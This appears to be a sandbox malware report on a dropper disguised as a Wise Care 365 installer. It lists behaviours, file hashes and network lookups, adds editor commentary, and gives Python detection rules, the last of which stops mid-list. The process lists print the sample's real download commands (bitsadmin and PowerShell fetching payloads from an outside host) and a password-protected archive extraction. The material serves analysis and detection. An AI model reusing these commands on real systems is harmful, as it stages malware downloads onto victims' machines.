Analysis Overview
SHA256
9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da
Threat Level: Known bad
The file 9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe was found to be: Known bad.
Malicious Activity Summary
Download via BitsAdmin
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-26 04:49
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-26 04:49
Reported
2024-07-26 04:52
Platform
win7-20240704-en
Max time kernel
148s
Max time network
124s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
| N/A | N/A | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe
"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"
C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp" /SL5="$C0150,38098121,731648,C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1r7d2kvUf3 "*.7z"
C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
"C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe"
C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$301D2,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | thddghdd3.com | udp |
| US | 8.8.8.8:53 | thddghdd3.com | udp |
Files
memory/2920-0-0x0000000000400000-0x00000000004C0000-memory.dmp
memory/2920-2-0x0000000000401000-0x00000000004A9000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
| MD5 | f098bb35dca6ae44a05c65aac7a5444b |
| SHA1 | c5c50d740c1b8e9d8715fc3b2c8026156295a437 |
| SHA256 | 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe |
| SHA512 | 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b |
memory/1284-12-0x0000000000400000-0x000000000067B000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\ProgramData\ConsoleApp\ControlSet000.bat
| MD5 | 484c8df5d5bd9d82f4ac1861472cf519 |
| SHA1 | eddc0d20c81d9dba14ee0be32c7c5f563481e792 |
| SHA256 | f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953 |
| SHA512 | 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7 |
C:\ProgramData\ConsoleApp\main.bat
| MD5 | 0ddc6dd98f86cff7e50c1621fd16b55a |
| SHA1 | 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a |
| SHA256 | b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6 |
| SHA512 | 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609 |
\ProgramData\ConsoleApp\7za.exe
| MD5 | c3d309156b8e8cf1d158de5fab1c2b40 |
| SHA1 | 58ad15d91abac2c6203e389ac8a8ff6685406d41 |
| SHA256 | 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c |
| SHA512 | 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498 |
memory/2920-57-0x0000000000400000-0x00000000004C0000-memory.dmp
memory/1284-58-0x0000000000400000-0x000000000067B000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
| MD5 | 05fda662bb382c2c95b9318b2394b246 |
| SHA1 | 69365314afb6102209a806e0e474d94e58207ec6 |
| SHA256 | 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2 |
| SHA512 | b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312 |
memory/2688-66-0x0000000000400000-0x0000000000417000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp
| MD5 | 9d7850e858c24db77b91b25adf93812f |
| SHA1 | f0bb0a9074b38dad7492422247c0a316197d26b6 |
| SHA256 | c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8 |
| SHA512 | e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec |
\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\ISTask.dll
| MD5 | 86a1311d51c00b278cb7f27796ea442e |
| SHA1 | ac08ac9d08f8f5380e2a9a65f4117862aa861a19 |
| SHA256 | e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d |
| SHA512 | 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec |
memory/1832-84-0x0000000000690000-0x00000000006A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\VclStylesInno.dll
| MD5 | b0ca93ceb050a2feff0b19e65072bbb5 |
| SHA1 | 7ebbbbe2d2acd8fd516f824338d254a33b69f08d |
| SHA256 | 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246 |
| SHA512 | 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2 |
memory/1832-90-0x0000000000670000-0x0000000000671000-memory.dmp
memory/1832-88-0x00000000070E0000-0x00000000073FA000-memory.dmp
memory/1832-91-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-93-0x00000000006B0000-0x00000000006B1000-memory.dmp
memory/1832-94-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-92-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-95-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-96-0x00000000006C0000-0x00000000006C1000-memory.dmp
memory/1832-97-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-98-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-99-0x00000000006D0000-0x00000000006D1000-memory.dmp
memory/1832-100-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-102-0x0000000001E90000-0x0000000001E91000-memory.dmp
memory/1832-101-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-103-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-104-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-105-0x0000000002490000-0x0000000002491000-memory.dmp
memory/1832-106-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-107-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-111-0x0000000007550000-0x0000000007551000-memory.dmp
memory/1832-110-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-109-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-108-0x0000000007540000-0x0000000007541000-memory.dmp
memory/1832-112-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-113-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-114-0x0000000007560000-0x0000000007561000-memory.dmp
memory/1832-115-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-116-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-118-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-119-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-133-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-145-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-144-0x0000000007600000-0x0000000007601000-memory.dmp
memory/1832-143-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-142-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-141-0x00000000075F0000-0x00000000075F1000-memory.dmp
memory/1832-140-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-139-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-138-0x00000000075E0000-0x00000000075E1000-memory.dmp
memory/1832-137-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-136-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-135-0x00000000075D0000-0x00000000075D1000-memory.dmp
memory/1832-134-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-132-0x00000000075C0000-0x00000000075C1000-memory.dmp
memory/1832-131-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-130-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-129-0x00000000075B0000-0x00000000075B1000-memory.dmp
memory/1832-128-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-127-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-126-0x00000000075A0000-0x00000000075A1000-memory.dmp
memory/1832-125-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-124-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-123-0x0000000007590000-0x0000000007591000-memory.dmp
memory/1832-122-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-121-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-120-0x0000000007580000-0x0000000007581000-memory.dmp
memory/1832-117-0x0000000007570000-0x0000000007571000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-26 04:49
Reported
2024-07-26 04:52
Platform
win10v2004-20240709-en
Max time kernel
142s
Max time network
125s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
| N/A | N/A | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe
"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"
C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp" /SL5="$40210,38098121,731648,C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1r7d2kvUf3 "*.7z"
C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe
"C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe"
C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$20276,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe"
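The two Processes lists (behavioral1 and behavioral2) show the same chain: the Inno Setup stub unpacks to an `is-XXXXX.tmp` directory, drops `ControlSet000.bat` and `main.bat` under `C:\ProgramData\ConsoleApp\`, and the batch files use only built-in or bundled tooling: `bitsadmin /transfer` and a PowerShell `WebClient.DownloadFile` to fetch from `thddghdd3.com`, a dropped `7za.exe` to extract `*.7z` with the archive password given inline (`-p1r7d2kvUf3`), a `timeout /T 3` delay, and finally a second Inno Setup installer named after Wise Care 365 as the visible decoy. The generic signatures on the `.tmp` stubs (SetWindowsHookEx, FindShellTrayWindow, GetForegroundWindowSpam) fire on ordinary Inno Setup installers too; the detectable part is the batch-driven download and password-protected unpack. The following Python is an added example, not part of this report: it runs a small set of command-line rules over process-creation records and extracts the IOCs worth pivoting on. The input records are constructed from the command lines above plus two benign lines the rules must ignore, and the ATT&CK technique IDs are the editor's mapping rather than something the report states.

```python
"""Flag the LOLBin download-and-unpack chain recorded in the Processes lists.

Added example (not part of the sandbox report). Runs regex rules over process
command lines and pulls out pivotable IOCs. Sample input is constructed from
the behavioral1/behavioral2 runs; ATT&CK IDs are the editor's mapping.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed input: command lines from the two detonations, plus two benign
# lines (a normal 7-Zip backup and a bitsadmin job listing) the rules must ignore.
SAMPLE_PROCESSES = [
    r'cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "',
    r'C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "',
    r'bitsadmin /transfer Explorers /download /priority FOREGROUND '
    r'http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml',
    r'''powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"''',
    r'7za.exe x -y -p1r7d2kvUf3 "*.7z"',
    r'timeout /T 3 /NOBREAK',
    r'"C:\Program Files\7-Zip\7z.exe" a backup.7z C:\Users\Admin\Documents',
    r'bitsadmin /list /allusers',
]


@dataclass
class Finding:
    rule: str
    technique: str          # ATT&CK technique ID (editor's mapping, assumption)
    cmdline: str
    iocs: dict = field(default_factory=dict)


# (rule name, ATT&CK ID, pattern). Named groups become IOCs.
RULES = [
    ("Download via BitsAdmin", "T1197",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*?/transfer\b.*?(?P<url>https?://\S+)", re.I)),
    ("PowerShell WebClient download", "T1059.001",
     re.compile(r"\bpowershell(?:\.exe)?\b.*?DownloadFile\(\s*'(?P<url>https?://[^']+)'", re.I)),
    ("7-Zip extraction with password on the command line", "T1140",
     re.compile(r"\b7za?(?:\.exe)?\b\s+[xe]\b.*?\s-p(?P<password>\S+)", re.I)),
    ("Batch script run from ProgramData", "T1059.003",
     re.compile(r'\bcmd(?:\.exe)?\b.*?/c\s+"*(?P<script>[A-Za-z]:\\ProgramData\\[^"]+\.(?:bat|cmd))"', re.I)),
    ("Execution delay via timeout.exe", "T1497.003",
     re.compile(r"\btimeout(?:\.exe)?\b.*?/T\s+(?P<seconds>\d+)", re.I)),
]


def scan(cmdlines):
    """Return one Finding per (command line, rule) match."""
    findings = []
    for line in cmdlines:
        for rule, technique, rx in RULES:
            m = rx.search(line)
            if m:
                findings.append(Finding(rule, technique, line,
                                        {k: v for k, v in m.groupdict().items() if v}))
    return findings


def is_loader_chain(findings):
    """Each behaviour alone is common admin noise; a downloader plus a
    ProgramData batch script plus a scripted password-protected unpack is not."""
    seen = {f.technique for f in findings}
    has_downloader = bool(seen & {"T1197", "T1059.001"})
    return has_downloader and "T1140" in seen and "T1059.003" in seen


def extract_iocs(findings):
    """Collect URLs, hostnames, archive passwords and script paths from the findings."""
    iocs = {"urls": set(), "domains": set(), "archive_passwords": set(), "scripts": set()}
    for f in findings:
        if "url" in f.iocs:
            iocs["urls"].add(f.iocs["url"])
            iocs["domains"].add(urlparse(f.iocs["url"]).hostname)
        if "password" in f.iocs:
            iocs["archive_passwords"].add(f.iocs["password"])
        if "script" in f.iocs:
            iocs["scripts"].add(f.iocs["script"])
    return iocs


if __name__ == "__main__":
    found = scan(SAMPLE_PROCESSES)
    for f in found:
        print(f"[{f.technique}] {f.rule}: {f.iocs}")
    print("loader chain:", is_loader_chain(found))
    print("IOCs:", extract_iocs(found))
```

Because the archive password is passed on the command line, it is recoverable from ordinary process-creation telemetry (Sysmon event 1 or 4688 with command-line auditing), so the staged payload can be unpacked for analysis even when the sandbox never received it.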
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thddghdd3.com | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
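Most rows in the win10 Network table are sandbox background: reverse (`in-addr.arpa`) lookups of Microsoft address space and connections to `tse1.mm.bing.net`, none of which appear in the sample's command lines. The only query attributable to the sample is `thddghdd3.com`, and in neither run is it followed by a TCP connection, so `Telemetry.xml` and `hfile.bin` were never retrieved and the content of the `*.7z` stage is not captured in the Files list. The following Python is an added example, not part of the report: it separates the rows into sample-attributable, background, reverse-lookup and unexplained buckets, decodes each PTR name back to the address it resolves, and records whether a connection actually followed each lookup. The rows are constructed from the table above, the background-host allowlist is an assumption for the example, and the command-line host set comes from the Processes list.

```python
"""Separate sample-attributable network activity from sandbox/OS background.

Added example (not part of the sandbox report). Rows are constructed from the
behavioral2 Network table; BACKGROUND_HOSTS is an assumed allowlist.
"""
from collections import defaultdict

# Constructed from the win10 run's Network table: (destination, domain, proto).
NETWORK = [
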